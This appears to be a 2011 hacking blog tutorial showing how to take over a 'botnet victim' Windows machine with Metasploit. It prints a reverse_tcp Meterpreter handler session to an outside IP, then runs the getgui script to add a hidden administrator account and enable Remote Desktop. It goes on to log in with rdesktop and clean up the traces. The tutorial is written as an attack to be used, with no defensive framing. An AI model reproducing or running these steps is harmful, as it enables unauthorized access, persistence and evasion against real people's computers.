How to enable Remote Desktop Protocol using Metasploit
First of all exploit your victim
I am just going to Make my botnet vicitim download the metasploit backdoor so a meterpreter session opensNow we are going to see what commands are in the getguiCode:[*] Please wait while the Metasploit Pro Console initializes... [*] Starting Metasploit Console... _ _ / \ / \ __ _ __ /_/ __ | |\ / | _____ \ \ ___ _____ | | / \ _ \ \ | | \/| | | ___\ |- -| /\ / __\ | -__/ | | | | || | |- -| |_| | | | _|__ | |_ / -\ __\ \ | | | |_ \__/ | | | |_ |/ |____/ \___\/ /\ \___/ \/ \__| |_\ \___\ =[ metasploit v4.1.1-release [core:4.1 api:1.0] + -- --=[ 754 exploits - 418 auxiliary - 108 post + -- --=[ 228 payloads - 27 encoders - 8 nops [*] Successfully loaded plugin: pro msf > use exploit/multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(handler) > set lhost 192.168.0.2 lhost => 192.168.0.2 msf exploit(handler) > exploit [*] Started reverse handler on 192.168.0.2:4444[*] Starting the payload handler...[*] Sending stage (752128 bytes) to 190.95.99.131[*] Meterpreter session 1 opened (192.168.0.2:4444 -> 190.95.99.131:53835) at 2011-12-20 13:19:09 +1030 meterpreter >We are going to add the Username and Password to the ComputerCode:meterpreter > run getgui Windows Remote Desktop Enabler Meterpreter Script Usage: getgui -u-p Or: getgui -e OPTIONS: -e Enable RDP only. -f Forward RDP Connection. -h Help menu. -p The Password of the user to add. -u The Username of the user to add. Now you can go log on to that ComputerCode:meterpreter > run getgui -u s3rver -p hacked123[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator[*] Carlos Perez carlos_perez@darkoperator.com[*] Setting user account for logon[*] Adding User: s3rver with Password: hacked123[*] Adding User: s3rver to local group '╧εδⁿτεΓα≥σδΦ ≤Σαδσφφεπε ≡αßε≈σπε ±≥εδα'[*] Adding User: s3rver to local group '└Σ∞ΦφΦ±≥≡α≥ε≡√'[*] You can now login with the created user[*] For cleanup use command: run multi_console_command -rc C:/Users/doct0r.exe/.msf4/logs/scripts/getgui/clean_up__20111220.2802.rcNow you should be logged in to that ComputerCode:s3rver@s3rver~$ rdesktop -u s3rver -p hacked123 190.95.99.131
I will show you how to clean the Log'sThe logs should be deleted nowCode:meterpreter > run multi_console_command -rc /root/.msf3/logs/scripts/getgui/clean_up__20110112.2448.rc[*] Running Command List ...[*] Running command execute -H -f cmd.exe -a "/c net user s3rver /delete" Process 288 created. meterpreter >
©2011, copyright BLACK BURN
0 comments:
Post a Comment